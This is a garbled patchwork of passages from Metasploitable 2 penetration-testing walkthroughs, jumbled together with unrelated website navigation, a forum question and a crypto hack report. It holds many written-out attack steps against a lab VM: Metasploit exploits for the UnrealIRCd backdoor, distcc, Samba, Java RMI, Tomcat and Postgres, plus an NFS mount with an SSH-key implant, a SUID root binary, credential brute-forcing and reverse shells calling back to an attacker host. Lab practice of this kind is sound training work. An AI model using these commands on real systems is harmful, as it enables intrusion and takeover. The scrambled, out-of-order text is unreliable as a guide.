root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/, root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys, Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128, root@ubuntu:~# telnet 192.168.99.131 6200, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor, msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131, msf exploit(unreal_ircd_3281_backdoor) > exploit. Step 5: Select your Virtual Machine and click the Setting button. -- ---- Name Current Setting Required Description Armitage is very user friendly. The root directory is shared. ---- --------------- -------- ----------- msf auxiliary(telnet_version) > show options Type help; or \h for help. You can view CVE vulnerability details, exploits, references, metasploit modules, full list of vulnerable products and cvss score reports and vulnerability trends over time (e.g. RPORT 5432 yes The target port Rapid7 Metasploit Pro installers prior to version 4.13.0-2017022101 contain a DLL preloading vulnerability, wherein it is possible for the installer to load a malicious DLL located in the current working directory of the installer. Name Current Setting Required Description ---- --------------- ---- ----------- In Part 1 of this article we covered some examples of Service vulnerabilities, Server backdoors, and Web Application vulnerabilities. 5.port 1524 (Ingres database backdoor ) root, http://192.168.127.159:8080/oVUJAkfU/WAHKp.jar, Kali Linux VPN Options and Installation Walkthrough, Feroxbuster And Why It Is The Best Forced Browsing Attack Tool, How to Bypass Software Security Checks Through Reverse Engineering, Ethical Hacking Practice Test 6 Footprinting Fundamentals Level1, CEH Practice Test 5 Footprinting Fundamentals Level 0. [*] Writing to socket A :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead. 
Module options (exploit/multi/misc/java_rmi_server): The PHP info information disclosure vulnerability provides internal system information and service version information that can be used to look up vulnerabilities. THREADS 1 yes The number of concurrent threads STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host ---- --------------- -------- ----------- We again have to elevate our privileges from here. We can escalate our privileges using the earlier udev exploit, so we're not going to go over it again. Payload options (cmd/unix/reverse): The advantage is that these commands are executed with the same privileges as the application. -- ---- [*] Found shell. The nmap command uses a few flags to conduct the initial scan. Use the showmount command to see the export list of the NFS server. This could allow more attacks against the database to be launched by an attacker. msf exploit(distcc_exec) > show options For this walkthrough I use the Metasploit framework to attempt to perform a penetration testing exercise on Metasploitable 2. The interface looks like a Linux command-line shell. Initially, to get the server version we will use an auxiliary module: Now we can use an appropriate exploit against the target with the information in hand: Samba username map script Command Execution. msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true Execute Metasploit framework by typing msfconsole on the Kali prompt: Search all. Server version: 5.0.51a-3ubuntu5 (Ubuntu). Name Current Setting Required Description This is an issue many in infosec have to deal with all the time. Every CVE Record added to the list is assigned and published by a CNA. The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Set the SUID bit using the following command: chmod 4755 rootme. 
-- ---- RHOST 192.168.127.154 yes The target address You can do so by following the path: Applications Exploitation Tools Metasploit. A test environment provides a secure place to perform penetration testing and security research. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. msf exploit(java_rmi_server) > set LHOST 192.168.127.159 msf exploit(unreal_ircd_3281_backdoor) > exploit Payload options (cmd/unix/interact): Step 2: Vulnerability Assessment. In the online forums some people think this issue is due to a problem with Metasploit 6 whilst Metasploit 5 does not have this issue. msf exploit(usermap_script) > set payload cmd/unix/reverse Name Current Setting Required Description [*] Attempting to automatically select a target [*] Reading from sockets Step 4: Display Database Version. THREADS 1 yes The number of concurrent threads Help Command For this, Metasploit has an exploit available: A documented security flaw is used by this module to implement arbitrary commands on any system operating distccd. ---- --------------- -------- ----------- RHOSTS => 192.168.127.154 Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. You can connect to a remote MySQL database server using an account that is not password-protected. [*] Writing to socket B Be sure your Kali VM is in "Host-only Network" before starting the scan, so you can communicate with your target Metasploitable VM. Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. Module options (exploit/unix/misc/distcc_exec): True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0. Since we noticed previously that the MySQL database was not secured by a password, we're going to use a brute force auxiliary module to see whether we can get into it. 
Step 7: Display all tables in information_schema. msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154 This setup included an attacker using Kali Linux and a target using the Linux-based Metasploitable. Name Current Setting Required Description Digital Forensics and Incident Response (DFIR), Cloud Security with Unlimited Vulnerability Management, 24/7 MONITORING & REMEDIATION FROM MDR EXPERTS, SCAN MANAGEMENT & VULNERABILITY VALIDATION, PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES, SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD, THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE, PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY, UPCOMING OPPORTUNITIES TO CONNECT WITH US. ---- --------------- -------- ----------- [*] Reading from socket B [*] Started reverse handler on 192.168.127.159:4444 . In our previous article on How To install Metasploitable we covered the creation and configuration of a Penetration Testing Lab. [*] A is input Redirect the results of the uname -r command into file uname.txt. This document outlines many of the security flaws in the Metasploitable 2 image. USERNAME postgres no A specific username to authenticate as payload => cmd/unix/reverse The vulnerability being demonstrated here is how a backdoor was incorporated into the source code of a commonly used package, namely vsftp. :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead Both operating systems will be running as VMs within VirtualBox. ---- --------------- -------- ----------- An attacker can implement arbitrary OS commands by introducing a rev parameter that includes shell metacharacters to the TWikiUsers script. Closed 6 years ago. Module options (auxiliary/admin/http/tomcat_administration): Here's what's going on with this vulnerability. I employ the following penetration testing phases: reconnaissance, threat modelling and vulnerability identification, and exploitation. 
whoami In the video the Metasploitable-2 host is running at 192.168.56.102 and the Backtrack 5-R2 host at 192.168.56.1.3. This module takes advantage of the RMI Registry and RMI Activation Services default configuration, allowing classes to be loaded from any remote URL (HTTP). RHOST => 192.168.127.154 Proxies no Use a proxy chain You could log on without a password on this machine. DVWA is PHP-based using a MySQL database and is accessible using admin/password as login credentials. msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat To access a particular web application, click on one of the links provided. [*] Accepted the second client connection Open in app. rapid7/metasploitable3 Wiki. [*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1' This must be an address on the local machine or 0.0.0.0 msf exploit(usermap_script) > show options Nessus is a well-known and popular vulnerability scanner that is free for personal, non-commercial use that was first released in 1998 by Renaud Deraison and currently published by Tenable Network Security. There is also a spin-off project of Nessus 2, named OpenVAS, that is published under the GPL. Using a large number of vulnerability checks, called plugins in Nessus, you can . RHOST => 192.168.127.154 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the. After you have downloaded the Metasploitable 2 file, you will need to unzip the file to see its contents. VERBOSE true yes Whether to print output for all attempts - Cisco 677/678 Telnet Buffer Overflow . 
msf auxiliary(tomcat_administration) > run msf auxiliary(smb_version) > show options ---- --------------- -------- ----------- Now I just started learning about penetration testing. Unfortunately, I am now facing a problem: I just installed GVM / OpenVAS version 21.4.1 on a VM with Kali Linux 2020.4 installed, and in the other VM I have Metasploitable2 installed. Both VM networks are set to bridged, so they can ping each other because they are on the same network. 865.1 MB. [*] instance eval failed, trying to exploit syscall If so please share your comments below. Module options (exploit/multi/misc/java_rmi_server): [*] B: "7Kx3j4QvoI7LOU5z\r\n" Metasploitable 2 has deliberately vulnerable web applications pre-installed. It is also instrumental in Intrusion Detection System signature development. msf exploit(twiki_history) > show options msf exploit(postgres_payload) > exploit msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159 This program makes it easy to scale large compiler jobs across a farm of like-configured systems. Copyright 2023 HackingLoops All Rights Reserved, nmap -p1-65535 -A 192.168.127.154 In the current version as of this writing, the applications are. Now we narrow our focus and use Metasploit to exploit the ssh vulnerabilities. ---- --------------- -------- ----------- whoami Additionally, an ill-advised PHP information disclosure page can be found at http:///phpinfo.php. RPORT 139 yes The target port df8cc200 15 2767 00000001 0 0 00000000 2, ps aux | grep udev Differences between Metasploitable 3 and the older versions. Need to report an Escalation or a Breach? So all we have to do is use the remote shell program to log in: Last login: Wed May 7 11:00:37 EDT 2021 from :0.0 on pts/0, Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686. payload => cmd/unix/interact [*] USER: 331 Please specify the password. Copyright (c) 2000, 2021, Oracle and/or its affiliates. Other names may be trademarks of their respective. 
The command will return the configuration for eth0. msf exploit(udev_netlink) > show options . Associated Malware: FINSPY, LATENTBOT, Dridex. msf auxiliary(tomcat_administration) > show options Same as login.php. However, the exact version of Samba that is running on those ports is unknown. PASSWORD => postgres msf exploit(distcc_exec) > set RHOST 192.168.127.154 Working with the Vulnerability Validation Wizard, Validating Vulnerabilities Discovered by Nexpose, Social Engineering Campaign Details Report, Single Password Testing MetaModule Report, Understanding the Credentials Domino MetaModule Findings, Segmentation and Firewall Testing MetaModule, Managing the Database from the Pro Console, Metasploit service can't bind to port 3790, Items Displaying Incorrectly After Update, Installation failed: Signature failure Error, Use Meterpreter Locally Without an Exploit, Issue Restarting on Windows Due to RangeError, Social Engineering Campaigns Report Image Broken, Social Engineering Campaign Taking a Long Time, Downloading and Setting Up Metasploitable 2, Identifying Metasploitable 2's IP Address, https://information.rapid7.com/metasploitable-download.html, https://sourceforge.net/projects/metasploitable/. Step 6: Display Database Name. IP addresses are assigned starting from "101". msf exploit(usermap_script) > set LHOST 192.168.127.159 Additionally three levels of hints are provided ranging from "Level 0 - I try harder" (no hints) to "Level 2 - noob" (Maximum hints). BLANK_PASSWORDS false no Try blank passwords for all users Display the contents of the newly created file. We've used an Auxiliary Module for this one: So you know the msfadmin account credentials now, and if you log in and play around, you'll figure out that this account has the sudo rights, so you can execute commands as root. This set of articles discusses the RED TEAM's tools and routes of attack. 
[*] Backgrounding session 1 For your test environment, you need a Metasploit instance that can access a vulnerable target. msf exploit(java_rmi_server) > set RHOST 192.168.127.154 The purpose of this video is to create virtual networking environment to learn more about ethical hacking using Metasploit framework available in Kali Linux.. On metasploitable there were over 60 vulnerabilities, consisting of similar ones to the windows target. [*] Command: echo ZeiYbclsufvu4LGM; SSLCert no Path to a custom SSL certificate (default is randomly generated) Nessus was able to login with rsh using common credentials identified by finger. Either the accounts are not password-protected, or ~/.rhosts files are not properly configured. Let's first see what relevant information we can obtain using the Tomcat Administration Tool Default Access module: With credentials, we are now able to use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit: You may use this module to execute a payload on Apache Tomcat servers that have a manager application that is exposed. whoami Getting access to a system with a writeable filesystem like this is trivial. PASSWORD no A specific password to authenticate with Name Current Setting Required Description [*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:33383) at 2021-02-06 23:03:13 +0300 In Cisco Prime LAN Management Solution, this vulnerability is reported to exist but may be present on any host that is not configured appropriately. Stop the Apache Tomcat 8.0 Tomcat8 service. With the udev exploit, we'll exploit the very same vulnerability, but from inside Metasploit this time: [*] Started reverse double handler The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. 
RPORT 21 yes The target port [*] Scanned 1 of 1 hosts (100% complete) Exploit target: Individual web applications may additionally be accessed by appending the application directory name onto http:// to create URL http:////. ---- --------------- -------- ----------- Mitigation: Update . ---- --------------- -------- ----------- gcc root.c -o rootme (This will compile the C file to executable binary) Step 12: Copy the compiled binary to the msfadmin directory in NFS share. LHOST => 192.168.127.159 Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Your identification has been saved in /root/.ssh/id_rsa. Here in Part 2 we are going to continue looking at vulnerabilities in other Web Applications within the intentionally vulnerable Metasploitable Virtual Machine (VM). Backdoors - A few programs and services have been backdoored. payload => java/meterpreter/reverse_tcp Module options (auxiliary/scanner/telnet/telnet_version): Select Metasploitable VM as a target victim from this list. msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154 (Note: A video tutorial on installing Metasploitable 2 is available here.). ================ As the payload is run as the constructor of the shared object, it does not have to adhere to particular Postgres API versions. RHOSTS yes The target address range or CIDR identifier List of known vulnerabilities and exploits . USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line VERBOSE false no Enable verbose output Module options (exploit/linux/postgres/postgres_payload): Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres Metasploitable Networking: These are the default statuses which can be changed via the Toggle Security and Toggle Hints buttons. 
[*] Reading from sockets nc -vv -l -p 5555 < 8572, sk Eth Pid Groups Rmem Wmem Dump Locks This must be an address on the local machine or 0.0.0.0 The hackers exploited a permission vulnerability and profited about $1 million by manipulating the price of the token The Nessus scan exposed the vulnerability of the TWiki web application to remote code execution.